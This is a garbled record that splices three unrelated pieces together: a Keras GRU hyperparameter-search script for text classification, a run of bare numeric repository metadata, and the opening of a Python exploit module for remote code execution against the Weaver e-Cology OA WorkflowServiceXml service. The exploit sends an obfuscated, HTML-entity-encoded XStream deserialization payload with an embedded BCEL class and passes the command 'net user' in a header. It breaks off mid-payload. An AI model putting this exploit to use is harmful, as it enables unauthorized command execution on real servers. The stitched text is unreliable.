StratifiedShuffleSplit(n_splits=1, test_size=0.15, random_state=0) for train_index, test_index in sss.split(data['comment'], data['label']): X_train, X_test = data['comment'].iloc[train_index], data['comment'].iloc[test_index] y_train, y_test = data['label'].iloc[train_index], data['label'].iloc[test_index] param_grid = { 'unit_1': [32, 64, 128], 'dropout': [0.1, 0.2, 0.3, 0.4, 0.5], 'lr': stats.uniform(1e-4, 1e-2), 'epochs': 5, 'batch_size': [32, 64, 128] } X_train = vectorizer(np.array([[s] for s in X_train])).numpy() X_test = vectorizer(np.array([[s] for s in X_test])).numpy() X_train = keras.preprocessing.sequence.pad_sequences(X_train, maxlen=25) X_test = keras.preprocessing.sequence.pad_sequences(X_test, maxlen=25) kgs = KerasRandomSearch(get_model, param_grid, monitor='val_auc', greater_is_better=True, n_iter=15) kgs.search(X_train, y_train, validation_data=(X_test, y_test)) ############################################################################## ##model without FastText Embeddings def get_model(param, maxlen=25, vocab_size=n_word_unique + 1): inputs = layers.Input(shape=(maxlen,)) embedding_layer = layers.Embedding(input_dim = vocab_size, output_dim=param['embed_dim'], input_length=maxlen) x = embedding_layer(inputs) x = layers.Bidirectional(layers.GRU(param['unit_1'], input_dim=(None, param['embed_dim']), return_sequences=False, activation='tanh', dropout=param['dropout']))(x) outputs = layers.Dense(1, activation="sigmoid")(x) model = keras.Model(inputs=inputs, outputs=outputs) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=param['lr']), loss="binary_crossentropy", metrics=["accuracy", tf.keras.metrics.AUC(name='auc')]) return model from sklearn.model_selection import StratifiedShuffleSplit sss = StratifiedShuffleSplit(n_splits=1, test_size=0.15, random_state=0) for train_index, test_index in sss.split(data['comment'], data['label']): X_train, X_test = data['comment'].iloc[train_index], data['comment'].iloc[test_index] y_train, y_test = data['label'].iloc[train_index], data['label'].iloc[test_index] param_grid = { 'unit_1': [32, 64, 128], 'dropout': [0.1, 0.2, 0.3, 0.4, 0.5], 'embed_dim': [32, 64, 128], 'lr': stats.uniform(1e-4, 1e-2), 'epochs': 5, 'batch_size': [32, 64, 128] } X_train = keras.preprocessing.sequence.pad_sequences(X_train, maxlen=25) X_test = keras.preprocessing.sequence.pad_sequences(X_test, maxlen=25) kgs = KerasRandomSearch(get_model, param_grid, monitor='val_auc', greater_is_better=True, n_iter=15) kgs.search(X_train, y_train, validation_data=(X_test, y_test)) print(kgs.best_params)
43.804124
101
0.664392
571
4,249
4.744308
0.220666
0.022148
0.01292
0.026578
0.828719
0.817276
0.817276
0.817276
0.774456
0.774456
0
0.030049
0.185455
4,249
96
102
44.260417
0.752673
0.022594
0
0.712329
0
0
0.070499
0
0
0
0
0
0
1
0.027397
false
0
0.150685
0
0.205479
0.013699
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
1ef81f60598533a61f73f42b5eb13d51da413153
43,130
py
Python
Moudle/Weaver/Weaver_e_Cology_RCE.py
WingsSec/Meppo
454aa6ce6cc3e93cadb2dc0c455c56fa5e0f1a94
[ "MIT" ]
60
2022-03-22T02:40:41.000Z
2022-03-29T06:23:57.000Z
Moudle/Weaver/Weaver_e_Cology_RCE.py
BambooLove/Meppo
96e023c0b07c09f334b44fcfb9abfe741a082f0f
[ "MIT" ]
null
null
null
Moudle/Weaver/Weaver_e_Cology_RCE.py
BambooLove/Meppo
96e023c0b07c09f334b44fcfb9abfe741a082f0f
[ "MIT" ]
9
2022-03-22T12:10:44.000Z
2022-03-25T07:37:01.000Z
#!/usr/bin/env python3 # _*_ coding:utf-8 _*_ import requests import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning ######################################################################################################################## # 脚本信息 NAME='Weaver_e_Cology_RCE' AUTHOR="Faith" REMARK='泛微E-Cology WorkflowServiceXml RCE' FOFA_RULE='app="泛微-协同办公OA"' ######################################################################################################################## def poc(target): result={} url = target + "/services%20/WorkflowServiceXml" cmd = "net user" headers = { 'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)', 'SOAPAction': '""', 'Cmd': cmd, "Content-Type": "text/xml;charset=UTF-8" } data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn"> <soapenv:Header/> <soapenv:Body> <web:doCreateWorkflowRequest> <web:string> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn"> <soapenv:Header/> <soapenv:Body> <web:doCreateWorkflowRequest> <web:string> &#x3c;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x50;&#x72;&#x69;&#x6f;&#x72;&#x69;&#x74;&#x79;&#x51;&#x75;&#x65;&#x75;&#x65;&#x20;&#x73;&#x65;&#x72;&#x69;&#x61;&#x6c;&#x69;&#x7a;&#x61;&#x74;&#x69;&#x6f;&#x6e;&#x3d;&#x27;&#x63;&#x75;&#x73;&#x74;&#x6f;&#x6d;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x3c;&#x75;&#x6e;&#x73;&#x65;&#x72;&#x69;&#x61;&#x6c;&#x69;&#x7a;&#x61;&#x62;&#x6c;&#x65;&#x2d;&#x70;&#x61;&#x72;&#x65;&#x6e;&#x74;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x3c;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x50;&#x72;&#x69;&#x6f;&#x72;&#x69;&#x74;&#x79;&#x51;&#x75;&#x65;&#x75;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x69;&#x7a;&#x65;&#x3e;&#x32;&#x3c;&#x2f;&#x73;&#x69;&#x7a;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6d;&#x70;&#x61;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x66;&#x78;&#x2e;&#x63;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x2e;&#x4f;&#x62;&#x73;&#x65;&#x72;&#x76;&#x61;&#x62;&#x6c;&#x65;&#x4c;&#x69;&#x73;&#x74;&#x24;&#x31;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x6e;&#x74;&#x3e;&#x33;&#x3c;&#x2f;&#x69;&#x6e;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x62;&#x69;&#x6e;&#x64;&#x2e;&#x76;&#x32;&#x2e;&#x72;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x75;&#x6e;&#x6d;&#x61;&#x72;&#x73;&#x68;&#x61;&#x6c;&#x6c;&#x65;&#x72;&#x2e;&#x42;&#x61;&#x73;&#x65;&#x36;&#x34;&#x44;&#x61;&#x74;&#x61;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x61;&#x74;&#x61;&#x48;&#x61;&#x6e;&#x64;&#x6c;&#x65;&#x72;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x61;&#x74;&#x61;&#x53;&#x6f;&#x75;&#x72;&#x63;&#x65;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x77;&#x73;&#x2e;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x69;&#x6e;&#x67;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x58;&#x4d;&#x4c;&#x4d;&#x65;&#x73;&#x73;&#x61;&#x67;&#x65;&#x24;&#x58;&#x6d;&#x6c;&#x44;&#x61;&#x74;&#x61;&#x53;&#x6f;&#x75;&#x72;&#x63;&#x65;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x54;&#x79;&#x70;&#x65;&#x3e;&#x74;&#x65;&#x78;&#x74;&#x2f;&#x70;&#x6c;&#x61;&#x69;&#x6e;&#x3c;&#x2f;&#x63;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x54;&#x79;&#x70;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x69;&#x6f;&#x2e;&#x53;&#x65;&#x71;&#x75;&#x65;&#x6e;&#x63;&#x65;&#x49;&#x6e;&#x70;&#x75;&#x74;&#x53;&#x74;&#x72;&#x65;&#x61;&#x6d;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x65;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x78;&#x2e;&#x73;&#x77;&#x69;&#x6e;&#x67;&#x2e;&#x4d;&#x75;&#x6c;&#x74;&#x69;&#x55;&#x49;&#x44;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x73;&#x24;&#x4d;&#x75;&#x6c;&#x74;&#x69;&#x55;&#x49;&#x44;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x73;&#x45;&#x6e;&#x75;&#x6d;&#x65;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x74;&#x65;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x74;&#x6f;&#x6f;&#x6c;&#x73;&#x2e;&#x6a;&#x61;&#x76;&#x61;&#x63;&#x2e;&#x70;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x69;&#x6e;&#x67;&#x2e;&#x4a;&#x61;&#x76;&#x61;&#x63;&#x50;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x69;&#x6e;&#x67;&#x45;&#x6e;&#x76;&#x69;&#x72;&#x6f;&#x6e;&#x6d;&#x65;&#x6e;&#x74;&#x24;&#x4e;&#x61;&#x6d;&#x65;&#x50;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x49;&#x74;&#x65;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6e;&#x61;&#x6d;&#x65;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x41;&#x62;&#x73;&#x74;&#x72;&#x61;&#x63;&#x74;&#x4c;&#x69;&#x73;&#x74;&#x24;&#x49;&#x74;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x75;&#x72;&#x73;&#x6f;&#x72;&#x3e;&#x30;&#x3c;&#x2f;&#x63;&#x75;&#x72;&#x73;&#x6f;&#x72;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6c;&#x61;&#x73;&#x74;&#x52;&#x65;&#x74;&#x3e;&#x2d;&#x31;&#x3c;&#x2f;&#x6c;&#x61;&#x73;&#x74;&#x52;&#x65;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x65;&#x78;&#x70;&#x65;&#x63;&#x74;&#x65;&#x64;&#x4d;&#x6f;&#x64;&#x43;&#x6f;&#x75;&#x6e;&#x74;&#x3e;&#x30;&#x3c;&#x2f;&#x65;&#x78;&#x70;&#x65;&#x63;&#x74;&#x65;&#x64;&#x4d;&#x6f;&#x64;&#x43;&#x6f;&#x75;&#x6e;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6f;&#x75;&#x74;&#x65;&#x72;&#x2d;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x41;&#x72;&#x72;&#x61;&#x79;&#x73;&#x24;&#x41;&#x72;&#x72;&#x61;&#x79;&#x4c;&#x69;&#x73;&#x74;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x61;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x2d;&#x61;&#x72;&#x72;&#x61;&#x79;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x24;&#x24;&#x42;&#x43;&#x45;&#x4c;&#x24;&#x24;&#x24;&#x6c;&#x24;&#x38;&#x62;&#x24;&#x49;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x38;&#x35;&#x56;&#x24;&#x35;&#x62;&#x57;&#x24;&#x54;&#x57;&#x24;&#x55;&#x24;&#x66;&#x65;&#x24;&#x38;&#x36;&#x24;&#x71;&#x24;&#x63;&#x63;&#x30;&#x24;&#x4d;&#x24;&#x38;&#x32;&#x41;&#x24;&#x38;&#x34;&#x24;&#x61;&#x38;&#x24;&#x62;&#x64;&#x24;&#x64;&#x38;&#x56;&#x24;&#x4e;&#x24;&#x75;&#x24;&#x38;&#x39;&#x24;&#x64;&#x36;&#x24;&#x64;&#x65;&#x24;&#x4d;&#x24;&#x64;&#x36;&#x24;&#x38;&#x61;&#x24;&#x35;&#x63;&#x24;&#x65;&#x61;&#x24;&#x72;&#x24;&#x61;&#x30;&#x35;&#x24;&#x55;&#x24;&#x78;&#x24;&#x64;&#x61;&#x24;&#x65;&#x61;&#x30;&#x24;&#x69;&#x61;&#x24;&#x71;&#x24;&#x39;&#x39;&#x24;&#x38;&#x39;&#x24;&#x39;&#x33;&#x24;&#x4a;&#x50;&#x24;&#x37;&#x62;&#x24;&#x62;&#x31;&#x24;&#x61;&#x64;&#x24;&#x62;&#x64;&#x24;&#x64;&#x66;&#x24;&#x65;&#x66;&#x24;&#x61;&#x64;&#x24;&#x62;&#x64;&#x24;&#x62;&#x63;&#x24;&#x66;&#x38;&#x24;&#x65;&#x32;&#x53;&#x24;&#x6c;&#x24;&#x35;&#x63;&#x24;&#x61;&#x62;&#x24;&#x78;&#x6a;&#x24;&#x35;&#x62;&#x24;&#x62;&#x62;&#x24;&#x64;&#x61;&#x24;&#x33;&#x65;&#x24;&#x66;&#x36;&#x47;&#x69;&#x24;&#x62;&#x66;&#x33;&#x24;&#x4a;&#x24;&#x39;&#x34;&#x24;&#x39;&#x30;&#x24;&#x61;&#x38;&#x24;&#x61;&#x63;&#x24;&#x63;&#x35;&#x24;&#x39;&#x39;&#x39;&#x24;&#x66;&#x62;&#x24;&#x37;&#x63;&#x24;&#x66;&#x62;&#x24;&#x66;&#x36;&#x24;&#x65;&#x64;&#x24;&#x62;&#x64;&#x4f;&#x24;&#x65;&#x36;&#x24;&#x64;&#x66;&#x24;&#x35;&#x62;&#x24;&#x62;&#x66;&#x24;&#x66;&#x64;&#x24;&#x4a;&#x24;&#x65;&#x30;&#x31;&#x24;&#x66;&#x63;&#x24;&#x61;&#x63;&#x24;&#x61;&#x33;&#x24;&#x4a;&#x24;&#x38;&#x37;&#x74;&#x24;&#x61;&#x34;&#x31;&#x24;&#x6f;&#x24;&#x39;&#x37;&#x51;&#x24;&#x4e;&#x24;&#x38;&#x37;&#x75;&#x24;&#x69;&#x24;&#x63;&#x31;&#x73;&#x24;&#x67;&#x24;&#x38;&#x65;&#x24;&#x61;&#x61;&#x24;&#x63;&#x38;&#x24;&#x65;&#x38;&#x50;&#x31;&#x24;&#x61;&#x36;&#x24;&#x65;&#x32;&#x79;&#x24;&#x6a;&#x24;&#x65;&#x33;&#x38;&#x24;&#x73;&#x24;&#x39;&#x31;&#x24;&#x5f;&#x48;&#x24;&#x63;&#x39;&#x71;&#x24;&#x4e;&#x24;&#x54;&#x24;&#x66;&#x32;&#x79;&#x42;&#x24;&#x63;&#x37;&#x49;&#x24;&#x62;&#x63;&#x24;&#x75;&#x24;&#x39;&#x37;&#x24;&#x39;&#x37;&#x34;&#x24;&#x39;&#x63;&#x52;&#x71;&#x5a;&#x24;&#x38;&#x33;&#x24;&#x61;&#x39;&#x24;&#x70;&#x24;&#x38;&#x61;&#x49;&#x24;&#x4e;&#x24;&#x39;&#x36;&#x24;&#x38;&#x61;&#x24;&#x76;&#x24;&#x4e;&#x24;&#x76;&#x24;&#x56;&#x42;&#x24;&#x63;&#x37;&#x24;&#x5a;&#x4c;&#x24;&#x63;&#x62;&#x65;&#x46;&#x24;&#x38;&#x37;&#x24;&#x38;&#x64;&#x24;&#x62;&#x33;&#x24;&#x33;&#x61;&#x24;&#x62;&#x61;&#x30;&#x24;&#x61;&#x62;&#x24;&#x6e;&#x24;&#x78;&#x24;&#x39;&#x66;&#x39;&#x24;&#x62;&#x39;&#x38;&#x72;&#x71;&#x35;&#x24;&#x65;&#x34;&#x55;&#x24;&#x39;&#x63;&#x24;&#x64;&#x33;&#x24;&#x66;&#x31;&#x24;&#x51;&#x24;&#x33;&#x63;&#x24;&#x56;&#x24;&#x46;&#x24;&#x46;&#x24;&#x38;&#x64;&#x24;&#x62;&#x62;&#x6d;&#x24;&#x63;&#x37;&#x24;&#x66;&#x36;&#x24;&#x66;&#x37;&#x24;&#x75;&#x24;&#x49;&#x24;&#x63;&#x35;&#x24;&#x62;&#x62;&#x24;&#x63;&#x37;&#x24;&#x56;&#x24;&#x38;&#x34;&#x24;&#x48;&#x24;&#x64;&#x63;&#x24;&#x76;&#x24;&#x61;&#x31;&#x24;&#x61;&#x30;&#x35;&#x6d;&#x24;&#x33;&#x62;&#x62;&#x24;&#x62;&#x34;&#x24;&#x39;&#x38;&#x24;&#x39;&#x62;&#x24;&#x55;&#x24;&#x64;&#x65;&#x24;&#x39;&#x38;&#x39;&#x24;&#x39;&#x39;&#x24;&#x61;&#x35;&#x24;&#x71;&#x24;&#x39;&#x61;&#x76;&#x24;&#x7a;&#x33;&#x24;&#x33;&#x62;&#x6e;&#x7a;&#x24;&#x62;&#x36;&#x24;&#x64;&#x63;&#x57;&#x24;&#x38;&#x34;&#x61;&#x24;&#x37;&#x66;&#x24;&#x63;&#x36;&#x24;&#x61;&#x36;&#x24;&#x38;&#x64;&#x24;&#x65;&#x36;&#x24;&#x66;&#x34;&#x24;&#x62;&#x65;&#x24;&#x38;&#x31;&#x24;&#x61;&#x31;&#x74;&#x72;&#x68;&#x24;&#x63;&#x65;&#x24;&#x63;&#x65;&#x24;&#x66;&#x36;&#x24;&#x76;&#x24;&#x64;&#x30;&#x76;&#x24;&#x35;&#x62;&#x24;&#x64;&#x39;&#x24;&#x38;&#x61;&#x24;&#x63;&#x64;&#x24;&#x61;&#x38;&#x6f;&#x24;&#x65;&#x35;&#x24;&#x4c;&#x24;&#x61;&#x65;&#x35;&#x24;&#x78;&#x24;&#x37;&#x63;&#x24;&#x64;&#x61;&#x24;&#x39;&#x62;&#x24;&#x6a;&#x24;&#x63;&#x38;&#x24;&#x39;&#x61;&#x24;&#x65;&#x37;&#x24;&#x63;&#x66;&#x24;&#x78;&#x58;&#x24;&#x39;&#x64;&#x24;&#x33;&#x65;&#x6b;&#x24;&#x63;&#x65;&#x24;&#x39;&#x39;&#x24;&#x63;&#x39;&#x24;&#x61;&#x63;&#x24;&#x65;&#x39;&#x4c;&#x24;&#x74;&#x24;&#x76;&#x24;&#x77;&#x24;&#x55;&#x24;&#x61;&#x38;&#x24;&#x54;&#x24;&#x39;&#x64;&#x24;&#x57;&#x24;&#x66;&#x65;&#x24;&#x34;&#x30;&#x24;&#x64;&#x31;&#x24;&#x66;&#x33;&#x24;&#x38;&#x34;&#x24;&#x65;&#x33;&#x24;&#x6c;&#x24;&#x56;&#x24;&#x65;&#x37;&#x24;&#x38;&#x61;&#x24;&#x61;&#x32;&#x24;&#x65;&#x30;&#x24;&#x38;&#x66;&#x24;&#x75;&#x58;&#x24;&#x62;&#x37;&#x24;&#x4d;&#x24;&#x65;&#x38;&#x24;&#x38;&#x39;&#x33;&#x59;&#x61;&#x24;&#x66;&#x39;&#x24;&#x63;&#x39;&#x24;&#x52;&#x24;&#x65;&#x31;&#x24;&#x63;&#x66;&#x24;&#x62;&#x38;&#x53;&#x24;&#x64;&#x34;&#x58;&#x65;&#x55;&#x24;&#x63;&#x31;&#x65;&#x24;&#x38;&#x30;&#x24;&#x66;&#x66;&#x24;&#x61;&#x33;&#x24;&#x50;&#x4f;&#x24;&#x39;&#x65;&#x24;&#x72;&#x24;&#x39;&#x38;&#x24;&#x75;&#x24;&#x65;&#x35;&#x24;&#x38;&#x63;&#x24;&#x38;&#x32;&#x58;&#x24;&#x6a;&#x33;&#x24;&#x63;&#x33;&#x24;&#x62;&#x36;&#x24;&#x63;&#x38;&#x4a;&#x24;&#x78;&#x24;&#x39;&#x61;&#x24;&#x74;&#x24;&#x4b;&#x79;&#x24;&#x64;&#x37;&#x24;&#x76;&#x30;&#x24;&#x58;&#x24;&#x39;&#x64;&#x24;&#x6e;&#x24;&#x69;&#x24;&#x66;&#x33;&#x6c;&#x5f;&#x78;&#x74;&#x24;&#x61;&#x64;&#x24;&#x63;&#x63;&#x24;&#x78;&#x68;&#x24;&#x78;&#x24;&#x65;&#x62;&#x24;&#x64;&#x39;&#x6e;&#x24;&#x62;&#x32;&#x24;&#x79;&#x24;&#x65;&#x65;&#x24;&#x78;&#x63;&#x24;&#x66;&#x36;&#x24;&#x4c;&#x73;&#x24;&#x77;&#x24;&#x63;&#x30;&#x24;&#x38;&#x34;&#x24;&#x61;&#x63;&#x24;&#x64;&#x63;&#x54;&#x24;&#x62;&#x35;&#x24;&#x64;&#x62;&#x24;&#x38;&#x63;&#x24;&#x65;&#x66;&#x24;&#x64;&#x39;&#x24;&#x63;&#x65;&#x24;&#x62;&#x34;&#x74;&#x4b;&#x52;&#x24;&#x64;&#x61;&#x24;&#x63;&#x62;&#x24;&#x48;&#x45;&#x24;&#x64;&#x66;&#x24;&#x63;&#x65;&#x24;&#x73;&#x33;&#x24;&#x39;&#x36;&#x24;&#x65;&#x39;&#x38;&#x24;&#x38;&#x31;&#x24;&#x38;&#x35;&#x24;&#x63;&#x38;&#x24;&#x39;&#x63;&#x24;&#x65;&#x39;&#x24;&#x65;&#x64;&#x24;&#x64;&#x38;&#x24;&#x61;&#x31;&#x24;&#x61;&#x30;&#x63;&#x24;&#x39;&#x39;&#x24;&#x64;&#x61;&#x24;&#x64;&#x30;&#x24;&#x38;&#x32;&#x24;&#x72;&#x24;&#x66;&#x32;&#x24;&#x62;&#x65;&#x24;&#x65;&#x64;&#x24;&#x33;&#x61;&#x24;&#x33;&#x63;&#x6f;&#x24;&#x63;&#x39;&#x24;&#x66;&#x38;&#x24;&#x61;&#x36;&#x35;&#x24;&#x33;&#x62;&#x62;&#x24;&#x65;&#x36;&#x24;&#x44;&#x24;&#x38;&#x36;&#x24;&#x64;&#x39;&#x24;&#x59;&#x24;&#x77;&#x24;&#x37;&#x63;&#x24;&#x62;&#x36;&#x24;&#x38;&#x35;&#x24;&#x38;&#x61;&#x24;&#x6f;&#x24;&#x61;&#x62;&#x24;&#x63;&#x65;&#x52;&#x24;&#x62;&#x33;&#x24;&#x63;&#x65;&#x24;&#x79;&#x24;&#x6c;&#x24;&#x70;&#x24;&#x63;&#x39;&#x24;&#x62;&#x38;&#x45;&#x24;&#x63;&#x66;&#x24;&#x53;&#x24;&#x63;&#x33;&#x24;&#x62;&#x36;&#x24;&#x79;&#x43;&#x24;&#x39;&#x33;&#x64;&#x24;&#x33;&#x65;&#x24;&#x6e;&#x24;&#x4e;&#x24;&#x67;&#x24;&#x64;&#x38;&#x24;&#x38;&#x34;&#x24;&#x63;&#x64;&#x24;&#x77;&#x24;&#x65;&#x36;&#x24;&#x4d;&#x24;&#x63;&#x63;&#x63;&#x24;&#x63;&#x31;&#x24;&#x63;&#x30;&#x24;&#x63;&#x62;&#x24;&#x6d;&#x24;&#x64;&#x66;&#x24;&#x35;&#x62;&#x24;&#x79;&#x37;&#x24;&#x39;&#x37;&#x24;&#x62;&#x30;&#x24;&#x63;&#x63;&#x24;&#x61;&#x32;&#x35;&#x24;&#x65;&#x33;&#x24;&#x73;&#x24;&#x69;&#x24;&#x65;&#x31;&#x24;&#x63;&#x66;&#x24;&#x62;&#x62;&#x24;&#x64;&#x65;&#x6c;&#x24;&#x6f;&#x6b;&#x24;&#x58;&#x24;&#x37;&#x63;&#x24;&#x65;&#x31;&#x24;&#x71;&#x24;&#x63;&#x36;&#x24;&#x61;&#x63;&#x24;&#x37;&#x63;&#x66;&#x24;&#x61;&#x39;&#x24;&#x33;&#x63;&#x24;&#x77;&#x24;&#x35;&#x65;&#x31;&#x24;&#x66;&#x30;&#x24;&#x77;&#x24;&#x35;&#x65;&#x63;&#x24;&#x38;&#x35;&#x6a;&#x24;&#x61;&#x61;&#x24;&#x63;&#x31;&#x24;&#x38;&#x65;&#x58;&#x51;&#x34;&#x24;&#x44;&#x24;&#x61;&#x66;&#x24;&#x65;&#x33;&#x24;&#x43;&#x49;&#x5a;&#x49;&#x24;&#x33;&#x61;&#x24;&#x65;&#x33;&#x35;&#x24;&#x66;&#x30;&#x24;&#x47;&#x24;&#x64;&#x65;&#x34;&#x24;&#x66;&#x30;&#x24;&#x57;&#x24;&#x24;&#x24;&#x67;&#x78;&#x24;&#x68;&#x24;&#x58;&#x24;&#x61;&#x39;&#x24;&#x37;&#x62;&#x6a;&#x24;&#x39;&#x31;&#x24;&#x65;&#x36;&#x61;&#x24;&#x64;&#x33;&#x24;&#x6f;&#x24;&#x37;&#x62;&#x24;&#x47;&#x24;&#x64;&#x65;&#x24;&#x63;&#x31;&#x24;&#x62;&#x62;&#x4c;&#x24;&#x63;&#x39;&#x24;&#x63;&#x30;&#x24;&#x37;&#x62;&#x78;&#x24;&#x64;&#x66;&#x24;&#x63;&#x30;&#x24;&#x48;&#x24;&#x66;&#x38;&#x24;&#x39;&#x30;&#x39;&#x24;&#x79;&#x24;&#x64;&#x31;&#x24;&#x63;&#x66;&#x24;&#x64;&#x61;&#x56;&#x24;&#x54;&#x24;&#x63;&#x66;&#x32;&#x24;&#x38;&#x64;&#x24;&#x58;&#x24;&#x62;&#x33;&#x63;&#x24;&#x4d;&#x43;&#x37;&#x24;&#x66;&#x30;&#x24;&#x52;&#x24;&#x33;&#x65;&#x24;&#x24;&#x24;&#x38;&#x33;&#x24;&#x63;&#x62;&#x75;&#x24;&#x61;&#x38;&#x24;&#x38;&#x61;&#x24;&#x61;&#x30;&#x24;&#x63;&#x63;&#x24;&#x33;&#x66;&#x24;&#x65;&#x33;&#x24;&#x61;&#x66;&#x61;&#x24;&#x35;&#x65;&#x24;&#x63;&#x35;&#